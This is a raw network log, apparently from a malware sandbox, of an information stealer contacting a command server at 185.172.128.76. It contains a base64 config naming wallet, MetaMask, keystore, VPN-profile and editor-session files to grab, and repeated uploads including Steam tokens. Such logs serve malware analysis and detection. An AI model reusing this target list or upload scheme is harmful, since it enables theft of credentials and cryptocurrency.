Apr 25, 2024 09:04:17.071533918 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2052 Connection: keep-alive Vary: Accept-Encoding Data Raw: 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 5a 47 39 6a 65 43 77 71 4c 6e 68 73 63 33 68 38 4e 58 77 78 66 44 46 38 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6e 42 75 5a 79 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 5a 47 59 73 4b 6d 4a 68 59 32 74 31 63 43 6f 75 63 47 35 6e 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 6b 5a 69 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 35 6e 4c 43 70 79 5a 57 4e 76 64 6d 56 79 4b 69 35 77 5a 47 59 73 4b 6d 31 6c 64 47 46 74 59 58 4e 72 4b 69 34 71 4c 43 70 56 56 45 4d 74 4c 53 6f 75 4b 6e 77 78 4e 54 41 77 66 44 46 38 4d 58 78 45 54 30 4e 54 66 43 56 45 54 30 4e 56 54 55 56 4f 56 46 4d 6c 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 62 6d 63 73 4b 6e 64 68 62 47 78 6c 64 43 6f 75 63 47 52 6d 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 75 5a 79 77 71 59 6d 46 6a 61 33 56 77 4b 69 35 77 5a 47 59 73 4b 6e 4a 6c 59 32 39 32 5a 58 49 71 4c 6e 42 75 5a 79 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 52 6d 4c 43 70 74 5a 58 52 68 62 57 46 7a 61 79 6f 75 4b 69 77 71 56 56 52 44 4c 53 30 71 4c 69 70 38 4d 54 55 77 4d 48 77 78 66 44 46 38 52 45 39 44 55 33 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 51 73 4b 69 35 6b 62 32 4e 34 4c 43 6f 75 65 47 78 7a 65 48 77 31 66 44 46 38 4d 58 78 53 52 55 4e 38 4a 56 4a 46 51 30 56 4f 56 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 5a 47 39 6a 65 43 77 71 4c 6e 68 73 63 33 68 38 4e 58 77 78 66 44 46 38 55 6b 56 44 66 43 56 53 52 55 4e 46 54 6c 51 6c 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 62 6d 63 73 4b 6e 64 68 62 47 78 6c 64 43 6f 75 63 47 52 6d 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 75 5a 79 77 71 59 6d 46 6a 61 33 56 77 4b 69 35 77 5a 47 59 73 4b 6e 4a 6c 59 32 39 32 5a 58 49 71 4c 6e 42 75 5a 79 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 52 6d 4c 43 70 74 5a 58 52 68 62 57 46 7a 61 79 6f 75 4b 69 77 71 56 56 52 44 4c 53 30 71 4c 69 70 38 4d 54 55 77 4d 48 77 78 66 44 46 38 54 6b 39 55 52 56 42 42 52 48 77 6c 51 56 42 51 52 45 46 55 51 53 56 63 54 6d 39 30 5a 58 42 68 5a 43 73 72 58 48 77 71 4c 6e 68 74 62 48 77 78 4e 58 77 78 66 44 46 38 54 6b 39 55 52 56 42 42 52 48 77 6c 51 56 42 51 52 45 46 55 51 53 56 63 54 6d 39 30 5a 58 42 68 5a 43 73 72 58 47 4a 68 59 32 74 31 63 46 78 38 4b 69 34 71 66 44 45 31 66 44 46 38 4d 58 78 54 56 55 4a 4d 53 55 31 46 66 43 56 42 55 46 42 45 51 56 52 42 4a 56 78 54 64 57 4a 73 61 57 31 6c 49 46 52 6c 65 48 51 67 4d 31 78 4d 62 32 4e 68 62 46 78 54 5a 58 4e 7a 61 57 39 75 4c 6e 4e 31 59 6d 78 70 62 57 56 66 63 32 56 7a 63 32 6c 76 62 6c 78 38 4b 69 35 7a 64 57 4a 73 61 57 31 6c 58 79 70 38 4d 54 56 38 4d 58 77 78 66 46 5a 51 54 6c 39 44 61 58 4e 6a 62 31 5a 51 54 6e 77 6c 55 46 4a 50 52 31 4a 42 54 55 5a 4a 54 45 56 54 4a 56 78 63 4c 69 35 63 58 46 42 79 62 32 64 79 59 57 31 45 59 58 52 68 58 46 78 44 61 58 4e 6a 62 31 78 44 61 58 4e 6a 62 79 42 42 62 6e 6c 44 62 32 35 75 5a 57 4e 30 49 46 4e 6c 59 33 56 79 5a 53 42 4e 62 32 4a 70 62 47 6c 30 65 53 42 44 62 47 6c 6c 62 6e 52 63 55 48 4a 76 5a 6d 6c 73 5a 56 78 38 4b 69 35 34 62 57 78 38 4d 54 41 77 66 44 46 38 4d 48 78 57 55 45 35 66 52 6d 39 79 64 47 6c 75 5a 58 52 38 4a 56 42 53 54 30 64 53 51 55 31 47 53 Data Ascii: REVTS3wlREVTS1RPUCVcfCoudHh0LCouZG9jeCwqLnhsc3h8NXwxfDF8REVTS3wlREVTS1RPUCVcfCp3YWxsZXQqLnBuZywqd2FsbGV0Ki5wZGYsKmJhY2t1cCoucG5nLCpiYWNrdXAqLnBkZiwqcmVjb3ZlcioucG5nLCpyZWNvdmVyKi5wZGYsKm1ldGFtYXNrKi4qLCpVVEMtLSouKnwxNTAwfDF8MXxET0NTfCVET0NVTUVOVFMlXHwqd2FsbGV0Ki5wbmcsKndhbGxldCoucGRmLCpiYWNrdXAqLnBuZywqYmFja3VwKi5wZGYsKnJlY292ZXIqLnBuZywqcmVjb3ZlcioucGRmLCptZXRhbWFzayouKiwqVVRDLS0qLip8MTUwMHwxfDF8RE9DU3wlRE9DVU1FTlRTJVx8Ki50eHQsKi5kb2N4LCoueGxzeHw1fDF8MXxSRUN8JVJFQ0VOVCVcfCoudHh0LCouZG9jeCwqLnhsc3h8NXwxfDF8UkVDfCVSRUNFTlQlXHwqd2FsbGV0Ki5wbmcsKndhbGxldCoucGRmLCpiYWNrdXAqLnBuZywqYmFja3VwKi5wZGYsKnJlY292ZXIqLnBuZywqcmVjb3ZlcioucGRmLCptZXRhbWFzayouKiwqVVRDLS0qLip8MTUwMHwxfDF8Tk9URVBBRHwlQVBQREFUQSVcTm90ZXBhZCsrXHwqLnhtbHwxNXwxfDF8Tk9URVBBRHwlQVBQREFUQSVcTm90ZXBhZCsrXGJhY2t1cFx8Ki4qfDE1fDF8MXxTVUJMSU1FfCVBUFBEQVRBJVxTdWJsaW1lIFRleHQgM1xMb2NhbFxTZXNzaW9uLnN1YmxpbWVfc2Vzc2lvblx8Ki5zdWJsaW1lXyp8MTV8MXwxfFZQTl9DaXNjb1ZQTnwlUFJPR1JBTUZJTEVTJVxcLi5cXFByb2dyYW1EYXRhXFxDaXNjb1xDaXNjbyBBbnlDb25uZWN0IFNlY3VyZSBNb2JpbGl0eSBDbGllbnRcUHJvZmlsZVx8Ki54bWx8MTAwfDF8MHxWUE5fRm9ydGluZXR8JVBST0dSQU1GS
Apr 25, 2024 09:04:17.198395967 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAFIIJDAAAAKFHIDAAAK Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 09:04:17.544516087 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:17.551141024 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHJEBGIEBFIJKEBFBFHI Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 09:04:17.924470901 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:17.939028025 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFBFHDBKJEGHJJJKFIIJ Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 09:04:18.313035965 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:18.349822044 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGCAFHCAKFBFIECAFIIJ Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 09:04:18.699536085 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:18.714395046 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIIECFHDBAAECAAKFHDH Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 09:04:19.057140112 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:19.065924883 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGIDAAFIEHIEHJKFHCAE Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 09:04:19.402666092 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:19.474061012 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAKEBAKFHCFHIEBFBAFB Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 09:04:19.816215038 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:19.832355976 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAFIEBKKJJDAKFHIDBFH Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 09:04:20.189178944 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:20.196702957 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAAKKFHCFIECAAAKEGCF Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 09:04:20.541568041 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:20.548926115 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHJEBGIEBFIJKEBFBFHI Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 09:04:20.908843994 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:20.920319080 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHJEGCAEGIIIDHIEBKEB Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 09:04:21.275599957 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:21 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:21.287523031 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIJJKKJJDAAAAAKFHJJD Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 09:04:21.626247883 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:21 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:21.841082096 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJECGCBGDBKJJKEBFBFH Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 09:04:22.184989929 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:22.198569059 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAAKKFHCFIECAAAKEGCF Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 09:04:22.540488958 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:22.570010900 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHJKFCGHIDHCBGDHJKEB Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 09:04:22.908464909 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:22.965984106 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDAKJDHIEBFIIDGDGDBA Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 09:04:23.303839922 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:23.328957081 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIECBFIDGDAKFHIEHJKF Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 09:04:23.668330908 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:23.700097084 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGHIDGCAFCBAAAAAFHDA Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 09:04:24.039311886 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:24.057063103 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKJDGDGDHDGDBFIDHDBA Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 09:04:24.394273043 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:24.399780989 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAFHIDGIJKJKECBGDBGH Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 09:04:24.740741014 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:24.785445929 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCBAECGIEBKKFHIDAKEC Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 09:04:25.127547979 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:25.396949053 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKJDAEBFCBKECBGDBFCF Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 09:04:25.734050035 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:27.277864933 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAAAAKJKJEBGHJKFHIDG Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 09:04:27.621726036 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:27 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:27.639197111 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKKJKFBKKECFHJKEBKEH Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 09:04:27.978250980 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:27 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:27.984388113 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDHIIDAFIDGCFHJJDGDA Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 09:04:28.324717045 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:28.337191105 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGCAFHCAKFBFIECAFIIJ Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 09:04:28.681476116 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:28.745013952 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEHJDGIDBAAFIDGCGCAK Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 09:04:29.098098040 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:29.106034040 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAAAAKJKJEBGHJKFHIDG Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 09:04:29.452925920 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:29 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:29.461425066 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDGCAAFBFBKFIDGDHJDB Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 09:04:29.799691916 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:29 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:29.805217981 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIIDBKJJDGHDHJKEHJDB Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 09:04:30.145710945 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:30 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:30.152070999 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECFHIJKJKFIDHJKFBGHC Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 09:04:30.493598938 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:30 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:30.499890089 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCGHCBKFCFBFHIDHDBFC Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 09:04:30.830853939 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:30 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:30.837922096 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJECGCBGDBKJJKEBFBFH Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 09:04:31.174297094 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:31.182169914 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCBGCAFIIECBFIDHIJKF Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 09:04:31.528153896 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:31.533847094 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDGIJEGHDAECAKECAFCA Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 09:04:31.874802113 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:31.881079912 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDHIDHIEGIIIECAKEBFB Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 09:04:32.220980883 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:32.247904062 CEST	564	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJKJDAFHJDHIEBGCFIDB Host: 185.172.128.76 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 32 35 37 39 32 30 33 36 65 38 36 38 61 33 38 33 37 61 62 33 64 30 65 35 38 30 38 32 38 34 32 61 38 37 39 66 34 63 36 31 61 36 33 39 63 31 65 63 35 66 64 66 34 31 37 38 66 61 36 34 38 64 66 37 39 37 35 34 39 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 2d 2d 0d 0a Data Ascii: ------IJKJDAFHJDHIEBGCFIDBContent-Disposition: form-data; name="token"1c25792036e868a3837ab3d0e58082842a879f4c61a639c1ec5fdf4178fa648df7975496------IJKJDAFHJDHIEBGCFIDBContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IJKJDAFHJDHIEBGCFIDBContent-Disposition: form-data; name="file"------IJKJDAFHJDHIEBGCFIDB--
Apr 25, 2024 09:04:32.590280056 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:32.665040016 CEST	204	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJJEGIEHIJKKFIDHDGID Host: 185.172.128.76 Content-Length: 129011 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 09:04:33.393663883 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
